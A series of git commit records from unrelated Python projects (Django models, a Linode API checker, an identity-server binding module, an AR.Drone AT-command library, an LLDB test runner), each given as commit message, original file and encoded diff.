more_than_500_char_odd) == str_250 + middle + str_250 assert make_preview_from( more_than_500_char_even) == str_250 + middle + str_250 def test_generate_d3_object(self): assert generate_d3_object( {'a': 1, 'b': 2, 'c': 3, 'd': 4}, "object", "word", "count") == { 'name': 'object', 'children': [{'word': 'a', 'count': 1}, {'word': 'b', 'count': 2}, {'word': 'c', 'count': 3}, {'word': 'd', 'count': 4}]} def test_merge_list(self): assert merge_list([{"a": 1, "b": 2}, {"c": 3, "d": 4}]) == { 'a': 1, 'b': 2, 'c': 3, 'd': 4} def test_load_stastic(self): assert load_stastic( "this is a string string") == { "this": 1, "is": 1, "a": 1, "string": 2} def test_matrix_to_dict(self): assert matrix_to_dict([['', 'a', 'b', 'c', 'd'], [0, 1, 2, 3, 4]]) == \ [{'a': 1, 'b': 2, 'c': 3, 'd': 4}] def test_dict_to_matrix(self): assert dict_to_matrix( [{'a': 1, 'b': 2, 'c': 3, 'd': 4}]) == ( [['', 'a', 'b', 'c', 'd'], [0, 1, 2, 3, 4]], ['a', 'b', 'c', 'd']) class TestHtmlEscape: def test_amp(self): assert html_escape('&') == "&amp;" def test_quot(self): assert html_escape('"') == "&quot;" def test_apos(self): assert html_escape("'") == "&apos;" def test_gt(self): assert html_escape('>') == "&gt;" def test_lt(self): assert html_escape('<') == "&lt;" def test_all(self): assert html_escape('&"\'><') == '&amp;&quot;&apos;&gt;&lt;' assert html_escape("<html lang='en'></html>") == '&lt;html lang=&apo' \ 's;en&apos;&gt;&lt;' \ '/html&gt;' assert html_escape('<html lang="en"></html>') == '&lt;html lang=&quo' \ 't;en&quot;&gt;&lt;' \ '/html&gt;' class TestApplyFunctionExcludeTags: def dummy_function(self, input_string): return input_string + input_string def test_one_function(self): input_str = "<tag>asdf</tag>" assert apply_function_exclude_tags( input_str, [self.dummy_function]) == '<tag>asdfasdf</tag>' assert apply_function_exclude_tags( input_str, [str.upper]) == '<tag>ASDF</tag>' def test_two_functions(self): input_str = "<tag>asdf</tag>" assert apply_function_exclude_tags( input_str, [str.upper, self.dummy_function]) == '<tag>' \ 'ASDFASDF' \ '</tag>' def test_multiple_functions(self): assert apply_function_exclude_tags( '<tag>asdf</tag>', [str.upper, str.lower, self.dummy_function]) == '<tag>asdfasdf</tag>' def test_empty_string(self): input_str = "" assert apply_function_exclude_tags( input_str, [self.dummy_function]) == '' assert apply_function_exclude_tags( input_str, [str.upper]) == '' def test_tags_only(self): input_str = "<tag></tag>" assert apply_function_exclude_tags( input_str, [self.dummy_function]) == '<tag></tag>' assert apply_function_exclude_tags( input_str, [str.upper]) == '<tag></tag>' class TestDecodeBytes: def test_gb2312_decoding(self): assert decode_bytes(u'做戏之说做戏之'.encode('gb2312')) == '做戏之说做戏之' def test_utf16_decoding(self): assert decode_bytes(u'абвгдежзийкл'.encode('utf-16')) == 'абвгдежзийкл' def test_utf8_decoding(self): assert decode_bytes(u'España'.encode('utf-8')) == 'España' def test_iso8859_1_decoding(self): assert decode_bytes('Äpple'.encode('iso-8859-1')) == 'Äpple' def test_windows_1251_decoding(self): input_str = 'сегодняшнее домашнее задание.' \ ' Настенные часы висят на стене. ' assert decode_bytes(input_str.encode('windows-1251')) == input_str
Python
0.000001
@@ -219,70 +219,8 @@ tes%0A -from test.helpers.file_path import CHINESE_ENCODING_TEST_FILE%0A %0A%0Acl
c273fa5ba0ae43cc5979f1076349edf737a67710
Add reserved words to custom data field validation
corehq/apps/custom_data_fields/models.py
corehq/apps/custom_data_fields/models.py
from dimagi.ext.couchdbkit import (Document, StringProperty, BooleanProperty, SchemaListProperty, StringListProperty) from dimagi.ext.jsonobject import JsonObject from django.core.exceptions import ValidationError from django.utils.translation import ugettext as _ from .dbaccessors import * CUSTOM_DATA_FIELD_PREFIX = "data-field" # This list is used to grandfather in existing data, any new fields should use # the system prefix defined below SYSTEM_FIELDS = ["commtrack-supply-point"] SYSTEM_PREFIX = "commcare" def _validate_reserved_words(slug): if slug in SYSTEM_FIELDS: return _('You may not use "{}" as a field name').format(slug) for prefix in [SYSTEM_PREFIX, 'xml']: if slug and slug.startswith(prefix): return _('Field names may not begin with "{}"').format(prefix) def is_system_key(slug): return bool(_validate_reserved_words(slug)) def validate_reserved_words(slug): error = _validate_reserved_words(slug) if error is not None: raise ValidationError(error) class CustomDataField(JsonObject): slug = StringProperty() is_required = BooleanProperty() label = StringProperty() choices = StringListProperty() is_multiple_choice = BooleanProperty(default=False) class CustomDataFieldsDefinition(Document): """ Per-project user-defined fields such as custom user data. """ field_type = StringProperty() base_doc = "CustomDataFieldsDefinition" domain = StringProperty() fields = SchemaListProperty(CustomDataField) def get_fields(self, required_only=False): def _is_match(field): if required_only and not field.is_required: return False return True return filter(_is_match, self.fields) @classmethod def get_or_create(cls, domain, field_type): # todo: this overrides get_or_create from DocumentBase but with a completely different signature. # This method should probably be renamed. existing = get_by_domain_and_type(domain, field_type) if existing: return existing else: new = cls(domain=domain, field_type=field_type) new.save() return new # TODO use this in the CustomDataEditor too? def get_validator(self, data_field_class): """ Returns a validator to be used in bulk import """ def validate_choices(field, value): if field.choices and value and unicode(value) not in field.choices: return _( "'{value}' is not a valid choice for {slug}, the available " "options are: {options}." ).format( value=value, slug=field.slug, options=', '.join(field.choices), ) def validate_required(field, value): if field.is_required and not value: return _( "Cannot create or update a {entity} without " "the required field: {field}." ).format( entity=data_field_class.entity_string, field=field.slug ) def validate_custom_fields(custom_fields): errors = [] for field in self.fields: value = custom_fields.get(field.slug, None) errors.append(validate_required(field, value)) errors.append(validate_choices(field, value)) return ' '.join(filter(None, errors)) return validate_custom_fields def get_model_and_uncategorized(self, data_dict): """ Splits data_dict into two dictionaries: one for data which matches the model and one for data that doesn't """ if not data_dict: return {}, {} model_data = {} uncategorized_data = {} slugs = [field.slug for field in self.fields] for k, v in data_dict.items(): if k in slugs: model_data[k] = v else: uncategorized_data[k] = v return model_data, uncategorized_data
Python
0
@@ -461,17 +461,17 @@ IELDS = -%5B +( %22commtra @@ -486,17 +486,18 @@ y-point%22 -%5D +,) %0ASYSTEM_ @@ -516,16 +516,91 @@ mmcare%22%0A +RESERVED_WORDS = ('name', 'type', 'owner_id', 'external_id', 'hq_user_id')%0A %0A%0Adef _v @@ -622,24 +622,45 @@ d_words(slug +, words=SYSTEM_FIELDS ):%0A if sl @@ -665,29 +665,21 @@ slug in -SYSTEM_FIELDS +words :%0A @@ -1053,24 +1053,56 @@ d_words(slug +, SYSTEM_FIELDS + RESERVED_WORDS )%0A if err
510e04dfd68eeca2e940487eeca9e7474e7f2383
Fix methodcheck.py for the new API documentation style (split into subsections)
linode/methodcheck.py
linode/methodcheck.py
#!/usr/bin/python """ A quick script to verify that api.py is in sync with Linode's published list of methods. Copyright (c) 2010 Josh Wright <[email protected]> Copyright (c) 2009 Ryan Tucker <[email protected]> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ # URL of API documentation apidocurl = 'http://www.linode.com/api/autodoc.cfm' import api import re import urllib tmpfile, httpheaders = urllib.urlretrieve(apidocurl) tmpfd = open(tmpfile) local_methods = api.Api.valid_commands() remote_methods = [] # Read in the list of methods Linode has rg = re.compile('.*?\\?method=((?:[a-z][a-z\\.\\d\\-]+)\\.(?:[a-z][a-z\\-]+))(?![\\w\\.])') for i in tmpfd.readlines(): m = rg.search(i) if m: remote_methods.append(m.group(1).replace('.','_')) # Cross-check! for i in local_methods: if i not in remote_methods: print('REMOTE Missing: ' + i) for i in remote_methods: if i not in local_methods: print('LOCAL Missing: ' + i)
Python
0
@@ -1243,452 +1243,881 @@ %22%0A%0A# - URL of API documentation%0Aapidocurl = 'http://www.linode.com/api/autodoc.cfm'%0A%0Aimport api%0Aimport re%0Aimport urllib%0A%0Atmpfile, httpheaders = urllib.urlretrieve(apidocurl)%0Atmpfd = open(tmpfile)%0A%0Alocal_methods = api.Api.valid_commands()%0Aremote_methods = %5B%5D%0A%0A# Read in the list of methods Linode has%0Arg = re.compile('.*?%5C%5C?method=((?:%5Ba-z%5D%5Ba-z%5C%5C.%5C%5Cd%5C%5C-%5D+)%5C%5C.(?:%5Ba-z%5D%5Ba-z%5C%5C-%5D+))(?!%5B%5C%5Cw%5C%5C.%5D)')%0A%0Afor i in tmpfd.readlines():%0A m = rg.search(i)%0A +The list of subsections found in the API documentation. This should%0A#probably be discovered automatically in the future%0Aapi_subsections = ('linode', 'nodebalancer', 'stackscript', 'dns', 'utility')%0A%0Aimport api%0Aimport re%0Aimport itertools%0Afrom HTMLParser import HTMLParser%0Afrom urllib import unquote%0Afrom urllib2 import urlopen%0A%0Aclass SubsectionParser(HTMLParser):%0A base_url = 'http://www.linode.com/api/'%0A%0A def __init__(self, subsection):%0A HTMLParser.__init__(self)%0A self.subsection_re = re.compile('/api/%25s/(.*)$' %25 subsection)%0A self.methods = %5B%5D%0A url = self.base_url + subsection%0A req = urlopen(url)%0A self.feed(req.read())%0A%0A def handle_starttag(self, tag, attrs):%0A if tag == 'a' and attrs:%0A attr_dict = dict(attrs)%0A match = self.subsection_re.match(attr_dict.get('href', ''))%0A if m :%0A @@ -2112,16 +2112,20 @@ if m +atch :%0A @@ -2126,23 +2126,29 @@ -remote_ + self. methods. @@ -2154,17 +2154,29 @@ .append( -m +unquote(match .group(1 @@ -2176,16 +2176,17 @@ group(1) +) .replace @@ -2197,16 +2197,172 @@ ,'_'))%0A%0A +local_methods = api.Api.valid_commands()%0Aremote_methods = list(itertools.chain(*%5BSubsectionParser(subsection).methods for subsection in api_subsections%5D))%0A%0A # Cross-
e0521c1f9a12819fd89f12aed01c623628dc4c4d
Build options added.
intexration/propertyhandler.py
intexration/propertyhandler.py
import configparser import os class Build: def __init__(self, name, idx, bib): self._name = name self._idx = idx self._bib = bib def get_name(self): return self._name def get_idx(self): return self._idx def get_bib(self): return self._bib def get_tex(self): return self._name + '.tex' def get_pdf(self): return self._name + '.pdf' def get_log(self): return self._name + '.log' class PropertyHandler: def __init__(self, path): self._path = path def get_builds(self): builds = [] if os.path.exists(self._path): parser = configparser.ConfigParser() parser.read(self._path) for build_name in parser.sections(): idx = build_name + '.idx' bib = build_name builds.append(Build(build_name, idx, bib)) return builds
Python
0
@@ -800,33 +800,303 @@ i -dx = build_name + '.idx'%0A +f parser.has_option(build_name, 'idx'):%0A idx = parser%5Bbuild_name%5D%5B'idx'%5D%0A else:%0A idx = build_name + '.idx'%0A if parser.has_option(build_name, 'bib'):%0A bib = parser%5Bbuild_name%5D%5B'bib'%5D%0A else:%0A @@ -1183,16 +1183,16 @@ , bib))%0A + @@ -1204,10 +1204,8 @@ n builds -%0A%0A
3a3fe2687fb65a99a799e9cb3c63f00223f4b92b
Update models.py
simit/models.py
simit/models.py
from django.db import models from django.utils.translation import ugettext as _ from mptt.fields import TreeForeignKey from mptt.models import MPTTModel from simit.helper import load_url_pattern_names from tinymce.models import HTMLField from django.conf import settings from django.utils.functional import lazy from django.core.urlresolvers import reverse CUSTOM_TYPES = [ (1, "TEXT"), (2, "DATE"), (3, "NUMBER"), (4, "RICH_TEXT"), (5, "BOOLEAN"), (6, "CHOICES"), (7, "FILE"), (8, "IMAGE"), (9, "COLOR"), ] def get_urlconf(): try: if not hasattr(settings, "SIMIT_MENU_URLPATTERNS_MODULE"): return list(__import__(settings.ROOT_URLCONF).urls.urlpatterns) else: return list(__import__(settings.SIMIT_MENU_URLPATTERNS_MODULE).urls.urlpatterns) except Exception: return [] def dictfetchall(cursor): desc = cursor.description return [ dict(zip([col[0] for col in desc], row)) for row in cursor.fetchall() ] class CustomAreaCategory(models.Model): name = models.CharField(_('name'), max_length=50, unique=True, db_index=True) def __unicode__(self): return self.name class Meta: verbose_name = _('custom area category') verbose_name_plural = _('custom area categories') class CustomArea(models.Model): name = models.CharField(_('name'), max_length=100) slug = models.CharField(_('slug'), max_length=100, unique=True) value = models.TextField(_('value'), ) type = models.IntegerField(_('type'), choices=CUSTOM_TYPES) category = models.ForeignKey("simit.CustomAreaCategory") extra = models.TextField(_('extra data'), blank=True) description = models.CharField(_('description'), max_length=250, blank=True) def __unicode__(self): return self.name class Meta: verbose_name_plural = _("custom areas") verbose_name = _("custom area") class Page(models.Model): name = models.CharField(_('name'), max_length=255) content = HTMLField(_('content'), ) slug = models.SlugField(_('slug'), ) tags = models.CharField(_('tags'), max_length=255, blank=True) description = models.TextField(_('description'), blank=True) title = models.CharField(_('title'), max_length=255, blank=True) last_modified = models.DateTimeField(_('last modified'), auto_now=True) is_active = models.BooleanField(default=True) class Meta: verbose_name_plural = _("pages") verbose_name = _("page") def __unicode__(self): return self.name def get_absolute_url(self): url_conf = getattr(settings, 'SIMIT_PAGE_URL_NAME') if url_conf: return reverse(url_conf, args=(self.slug)) else: return '/page/%s' % self.slug class MenuSection(models.Model): name = models.CharField(_('name'), max_length=255) class Meta: verbose_name_plural = _("menu sections") verbose_name = _("menu section") def __unicode__(self): return self.name class Menu(MPTTModel): title = models.CharField(_('title'), max_length=255) parent = TreeForeignKey('self', null=True, blank=True, related_name='children', verbose_name=_('parent menu')) description = models.TextField(_('description'), blank=True) url = models.CharField(_('url'), max_length=255, blank=True, null=True) page = models.ForeignKey("simit.Page", blank=True, null=True) url_name = models.CharField(_('url pattern'), max_length=255, blank=True, null=True, choices=[(name, name) for name in load_url_pattern_names( lazy(get_urlconf, list)(), include_with_args=False)]) section = models.ForeignKey("simit.MenuSection") is_active = models.BooleanField(default=True) def __unicode__(self): return self.title def get_url(self): if self.page is not None: return self.page.get_absolute_url() elif self.url_name is not None: return reverse(self.url_name) else: return self.url class Meta: verbose_name_plural = _("menus") verbose_name = _("menu")
Python
0
@@ -2745,16 +2745,17 @@ elf.slug +, ))%0A
53055e47d14fd5905673941aa45ef9fe383eb885
Version for pypi.
inovonics/cloud/oauth/__version__.py
inovonics/cloud/oauth/__version__.py
#!/usr/bin/env python3 __version__ = '0.1.0.7'
Python
0
@@ -41,7 +41,7 @@ 1.0. -7 +8 '%0A
e6885fd2260dc9399f5ea2f835cbf65294d18a8d
make competiable with postgres new version 8.3
addons/report_analytic_line/report_analytic_line.py
addons/report_analytic_line/report_analytic_line.py
############################################################################## # # Copyright (c) 2004-2006 TINY SPRL. (http://tiny.be) All Rights Reserved. # # $Id: sale.py 1005 2005-07-25 08:41:42Z nicoe $ # # WARNING: This program as such is intended to be used by professional # programmers who take the whole responsability of assessing all potential # consequences resulting from its eventual inadequacies and bugs # End users who are looking for a ready-to-use solution with commercial # garantees and support are strongly adviced to contract a Free Software # Service Company # # This program is Free Software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. # ############################################################################## from osv import fields,osv class report_account_analytic_line_to_invoice(osv.osv): _name = "report.account.analytic.line.to.invoice" _description = "Analytic lines to invoice report" _auto = False _columns = { 'name': fields.date('Month', readonly=True), 'product_id':fields.many2one('product.product', 'Product', readonly=True), 'account_id':fields.many2one('account.analytic.account', 'Analytic account', readonly=True), 'product_uom_id':fields.many2one('product.uom', 'UoM', readonly=True), 'unit_amount': fields.float('Units', readonly=True), 'sale_price': fields.float('Sale price', readonly=True), 'amount': fields.float('Amount', readonly=True), } _order = 'name desc, product_id asc, account_id asc' def init(self, cr): cr.execute(""" CREATE OR REPLACE VIEW report_account_analytic_line_to_invoice AS ( SELECT DISTINCT(SUBSTRING(l.date for 7))||'-'||'01' AS name, MIN(l.id) AS id, l.product_id, l.account_id, SUM(l.amount) AS amount, SUM(l.unit_amount*t.list_price) AS sale_price, SUM(l.unit_amount) AS unit_amount, l.product_uom_id FROM account_analytic_line l left join product_product p on (l.product_id=p.id) left join product_template t on (p.product_tmpl_id=t.id) WHERE (invoice_id IS NULL) and (to_invoice IS NOT NULL) GROUP BY SUBSTRING(date for 7), product_id, product_uom_id, account_id ) """) report_account_analytic_line_to_invoice()
Python
0
@@ -2335,43 +2335,37 @@ NCT( -SUBSTRING(l.date for 7))%7C%7C'-'%7C%7C'01' +to_char(l.date,'YYYY-MM-DD')) AS @@ -3065,28 +3065,33 @@ -SUBSTRING(date for 7 +to_char(date,'YYYY-MM-DD' ), p
5d36e7d939b89a59dcb68002c244ac6684cb94c4
Fix access to assoc params
sydent/threepid/bind.py
sydent/threepid/bind.py
# -*- coding: utf-8 -*- # Copyright 2014 OpenMarket Ltd # Copyright 2018 New Vector Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import collections import json import logging import math import random import signedjson.sign from sydent.db.invite_tokens import JoinTokenStore from sydent.db.threepid_associations import LocalAssociationStore from sydent.util import time_msec from sydent.threepid.signer import Signer from sydent.http.httpclient import FederationHttpClient from sydent.threepid import ThreepidAssociation from OpenSSL import SSL from OpenSSL.SSL import VERIFY_NONE from StringIO import StringIO from twisted.internet import reactor, defer, ssl from twisted.names import client, dns from twisted.names.error import DNSNameError from twisted.web.client import FileBodyProducer, Agent from twisted.web.http_headers import Headers logger = logging.getLogger(__name__) class ThreepidBinder: # the lifetime of a 3pid association THREEPID_ASSOCIATION_LIFETIME_MS = 100 * 365 * 24 * 60 * 60 * 1000 def __init__(self, sydent): self.sydent = sydent def addBinding(self, medium, address, mxid): """Binds the given 3pid to the given mxid. It's assumed that we have somehow validated that the given user owns the given 3pid Args: medium (str): the type of 3pid address (str): the 3pid mxid (str): the mxid to bind it to """ localAssocStore = LocalAssociationStore(self.sydent) createdAt = time_msec() expires = createdAt + ThreepidBinder.THREEPID_ASSOCIATION_LIFETIME_MS assoc = ThreepidAssociation(medium, address, mxid, createdAt, createdAt, expires) localAssocStore.addOrUpdateAssociation(assoc) self.sydent.pusher.doLocalPush() joinTokenStore = JoinTokenStore(self.sydent) pendingJoinTokens = joinTokenStore.getTokens(medium, address) invites = [] for token in pendingJoinTokens: token["mxid"] = mxid token["signed"] = { "mxid": mxid, "token": token["token"], } token["signed"] = signedjson.sign.sign_json(token["signed"], self.sydent.server_name, self.sydent.keyring.ed25519) invites.append(token) if invites: assoc.extra_fields["invites"] = invites joinTokenStore.markTokensAsSent(medium, address) signer = Signer(self.sydent) sgassoc = signer.signedThreePidAssociation(assoc) self._notify(sgassoc, 0) return sgassoc def removeBinding(self, threepid, mxid): localAssocStore = LocalAssociationStore(self.sydent) localAssocStore.removeAssociation(threepid, mxid) self.sydent.pusher.doLocalPush() @defer.inlineCallbacks def _notify(self, assoc, attempt): mxid = assoc["mxid"] domain = mxid.split(":")[-1] server = yield self._pickServer(domain) post_url = "https://%s/_matrix/federation/v1/3pid/onbind" % ( server, ) logger.info("Making bind callback to: %s", post_url) # Make a POST to the chosen Synapse server http_client = FederationHttpClient(self.sydent) try: response = yield http_client.post_json_get_nothing(post_url, assoc, {}) except Exception as e: self._notifyErrback(assoc, attempt, e) return # If the request failed, try again with exponential backoff if response.code != 200: self._notifyErrback( assoc, attempt, "Non-OK error code received (%d)" % response.code ) else: logger.info("Successfully notified on bind for %s" % (mxid,)) # Only remove sent tokens when they've been successfully sent. if assoc.extra_fields["invite"]: try: joinTokenStore = JoinTokenStore(self.sydent) joinTokenStore.deleteTokens(assoc.medium, assoc.address) except Exception as e: logger.error( "Couldn't remove invite for % from the store: %s", mxid, e, ) def _notifyErrback(self, assoc, attempt, error): logger.warn("Error notifying on bind for %s: %s - rescheduling", assoc["mxid"], error) reactor.callLater(math.pow(2, attempt), self._notify, assoc, attempt + 1) # The below is lovingly ripped off of synapse/http/endpoint.py _Server = collections.namedtuple("_Server", "priority weight host port") @defer.inlineCallbacks def _pickServer(self, host): servers = yield self._fetchServers(host) if not servers: defer.returnValue("%s:8448" % (host,)) min_priority = servers[0].priority weight_indexes = list( (index, server.weight + 1) for index, server in enumerate(servers) if server.priority == min_priority ) total_weight = sum(weight for index, weight in weight_indexes) target_weight = random.randint(0, total_weight) for index, weight in weight_indexes: target_weight -= weight if target_weight <= 0: server = servers[index] defer.returnValue("%s:%d" % (server.host, server.port,)) return @defer.inlineCallbacks def _fetchServers(self, host): try: service = "_matrix._tcp.%s" % host answers, auth, add = yield client.lookupService(service) except DNSNameError: answers = [] if (len(answers) == 1 and answers[0].type == dns.SRV and answers[0].payload and answers[0].payload.target == dns.Name(".")): raise DNSNameError("Service %s unavailable", service) servers = [] for answer in answers: if answer.type != dns.SRV or not answer.payload: continue payload = answer.payload servers.append(ThreepidBinder._Server( host=str(payload.target), port=int(payload.port), priority=int(payload.priority), weight=int(payload.weight) )) servers.sort() defer.returnValue(servers)
Python
0
@@ -4355,30 +4355,22 @@ soc. -extra_fields%5B +get( %22invite -%22%5D +s%22) :%0A @@ -4510,30 +4510,36 @@ ssoc -. +%5B%22 medium +%22%5D , assoc -. +%5B%22 address +%22%5D )%0A @@ -4693,16 +4693,16 @@ xid, e,%0A + @@ -4716,17 +4716,16 @@ )%0A%0A -%0A def
602aa1ecdf74847b27d6cce0d91e8d2be721671d
clean up a bit of the at commands with newer conventions and more complete commands
ardrone/at.py
ardrone/at.py
import socket import struct import ardrone.constant def f2i(f): """Interpret IEEE-754 floating-point value as signed integer. Arguments: f -- floating point value """ return struct.unpack('i', struct.pack('f', f))[0] def ref(host, seq, takeoff, emergency=False): """ Basic behaviour of the drone: take-off/landing, emergency stop/reset) Parameters: seq -- sequence number takeoff -- True: Takeoff / False: Land emergency -- True: Turn off the engines """ p = 0b10001010101000000000000000000 if takeoff: p += 0b1000000000 if emergency: p += 0b0100000000 at(host, 'REF', seq, [p]) def pcmd(host, seq, progressive, lr, fb, vv, va): """ Makes the drone move (translate/rotate). Parameters: seq -- sequence number progressive -- True: enable progressive commands, False: disable (i.e. enable hovering mode) lr -- left-right tilt: float [-1..1] negative: left, positive: right rb -- front-back tilt: float [-1..1] negative: forwards, positive: backwards vv -- vertical speed: float [-1..1] negative: go down, positive: rise va -- angular speed: float [-1..1] negative: spin left, positive: spin right The above float values are a percentage of the maximum speed. """ p = 1 if progressive else 0 at(host, 'PCMD', seq, [p, float(lr), float(fb), float(vv), float(va)]) def ftrim(host, seq): """ Tell the drone it's lying horizontally. Parameters: seq -- sequence number """ at(host, 'FTRIM', seq, []) def zap(host, seq, stream): """ Selects which video stream to send on the video UDP port. Parameters: seq -- sequence number stream -- Integer: video stream to broadcast """ # FIXME: improve parameters to select the modes directly at(host, 'ZAP', seq, [stream]) def config(host, seq, option, value): """Set configuration parameters of the drone.""" at(host, 'CONFIG', seq, [str(option), str(value)]) def comwdg(host, seq): """ Reset communication watchdog. """ # FIXME: no sequence number at(host, 'COMWDG', seq, []) def aflight(host, seq, flag): """ Makes the drone fly autonomously. Parameters: seq -- sequence number flag -- Integer: 1: start flight, 0: stop flight """ at(host, 'AFLIGHT', seq, [flag]) def pwm(host, seq, m1, m2, m3, m4): """ Sends control values directly to the engines, overriding control loops. Parameters: seq -- sequence number m1 -- front left command m2 -- fright right command m3 -- back right command m4 -- back left command """ # FIXME: what type do mx have? pass def led(host, seq, anim, f, d): """ Control the drones LED. Parameters: seq -- sequence number anim -- Integer: animation to play f -- ?: frequence in HZ of the animation d -- Integer: total duration in seconds of the animation """ pass def anim(host, seq, anim, d): """ Makes the drone execute a predefined movement (animation). Parameters: seq -- sequcence number anim -- Integer: animation to play d -- Integer: total duration in sections of the animation """ at(host, 'ANIM', seq, [anim, d]) def at(host, command, seq, params): """ Parameters: command -- the command seq -- the sequence number params -- a list of elements which can be either int, float or string """ param_str = '' for p in params: if type(p) == int: param_str += ',%d' % p elif type(p) == float: param_str += ',%d' % f2i(p) elif type(p) == str: param_str += ',"'+p+'"' msg = 'AT*%s=%i%s\r' % (command, seq, param_str) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(msg.encode(), (host, ardrone.constant.COMMAND_PORT))
Python
0.000001
@@ -563,25 +563,25 @@ :%0A p -+ +%7C = 0b10000000 @@ -611,17 +611,17 @@ p -+ +%7C = 0b0100 @@ -2549,16 +2549,25 @@ m1 -- + Integer: front l @@ -2592,13 +2592,21 @@ -- -frigh +Integer: fron t ri @@ -2626,16 +2626,25 @@ m3 -- + Integer: back ri @@ -2664,16 +2664,25 @@ m4 -- + Integer: back le @@ -2708,47 +2708,46 @@ -# FIXME: what type do mx have?%0A pass +at(host, 'PWM', seq, %5Bm1, m2, m3, m4%5D) %0A%0Ade @@ -2908,9 +2908,13 @@ -- -? +Float : fr @@ -2919,17 +2919,17 @@ frequenc -e +y in HZ o @@ -3021,12 +3021,49 @@ -pass +at(host, 'LED', seq, %5Banim, float(f), d%5D) %0A%0Ade @@ -3284,20 +3284,19 @@ n in sec -ti on +d s of the @@ -3565,17 +3565,18 @@ aram +s _str = -'' +%5B%5D %0A @@ -3641,25 +3641,38 @@ aram +s _str - += ',%25d' %25 p +.append('%7B:d%7D'.format(p)) %0A @@ -3720,30 +3720,43 @@ aram +s _str - += ',%25d' %25 +.append('%7B:d%7D'.format( f2i(p) +)) %0A @@ -3802,54 +3802,79 @@ aram +s _str - += ',%22'+p+'%22'%0A msg = 'AT*%25s=%25i%25s%5Cr' %25 +.append('%22%7B:s%7D%22'.format(p))%0A msg = 'AT*%7B:s%7D=%7B:d%7D,%7B:s%7D%5Cr'.format (com @@ -3880,24 +3880,33 @@ mmand, seq, +','.join( param_str)%0A @@ -3903,16 +3903,17 @@ ram_str) +) %0A soc
9069c2678b68571406458f7414c7b0474183090b
Fix check for dictionary entry
lit/Suite/lldbtest.py
lit/Suite/lldbtest.py
from __future__ import absolute_import import os import subprocess import sys import lit.Test import lit.TestRunner import lit.util from lit.formats.base import TestFormat def getBuildDir(cmd): found = False for arg in cmd: if found: return arg if arg == '--build-dir': found = True return None class LLDBTest(TestFormat): def __init__(self, dotest_cmd): self.dotest_cmd = dotest_cmd def getTestsInDirectory(self, testSuite, path_in_suite, litConfig, localConfig): source_path = testSuite.getSourcePath(path_in_suite) for filename in os.listdir(source_path): # Ignore dot files and excluded tests. if (filename.startswith('.') or filename in localConfig.excludes): continue # Ignore files that don't start with 'Test'. if not filename.startswith('Test'): continue filepath = os.path.join(source_path, filename) if not os.path.isdir(filepath): base, ext = os.path.splitext(filename) if ext in localConfig.suffixes: yield lit.Test.Test(testSuite, path_in_suite + (filename, ), localConfig) def execute(self, test, litConfig): if litConfig.noExecute: return lit.Test.PASS, '' if test.config.lldb_disable_python: return (lit.Test.UNSUPPORTED, 'Python module disabled') if test.config.unsupported: return (lit.Test.UNSUPPORTED, 'Test is unsupported') testPath, testFile = os.path.split(test.getSourcePath()) # On Windows, the system does not always correctly interpret # shebang lines. To make sure we can execute the tests, add # python exe as the first parameter of the command. cmd = [sys.executable] + self.dotest_cmd + [testPath, '-p', testFile] # The macOS system integrity protection (SIP) doesn't allow injecting # libraries into system binaries, but this can be worked around by # copying the binary into a different location. if test.config.environment['DYLD_INSERT_LIBRARIES'] and \ sys.executable.startswith('/System/'): builddir = getBuildDir(cmd) assert(builddir) copied_python = os.path.join(builddir, 'copied-system-python') import shutil shutil.copy(sys.executable, os.path.join(builddir, copied_python)) cmd[0] = copied_python try: out, err, exitCode = lit.util.executeCommand( cmd, env=test.config.environment, timeout=litConfig.maxIndividualTestTime) except lit.util.ExecuteCommandTimeoutException: return (lit.Test.TIMEOUT, 'Reached timeout of {} seconds'.format( litConfig.maxIndividualTestTime)) if exitCode: return lit.Test.FAIL, out + err passing_test_line = 'RESULT: PASSED' if passing_test_line not in out and passing_test_line not in err: msg = ('Unable to find %r in dotest output:\n\n%s%s' % (passing_test_line, out, err)) return lit.Test.UNRESOLVED, msg return lit.Test.PASS, ''
Python
0
@@ -2188,56 +2188,58 @@ if -test.config.environment%5B'DYLD_INSERT_LIBRARIES'%5D +'DYLD_INSERT_LIBRARIES' in test.config.environment and
f27dc9d2793bb555d80a5c8e6635ba246278d017
Add DES support
simplecrypto.py
simplecrypto.py
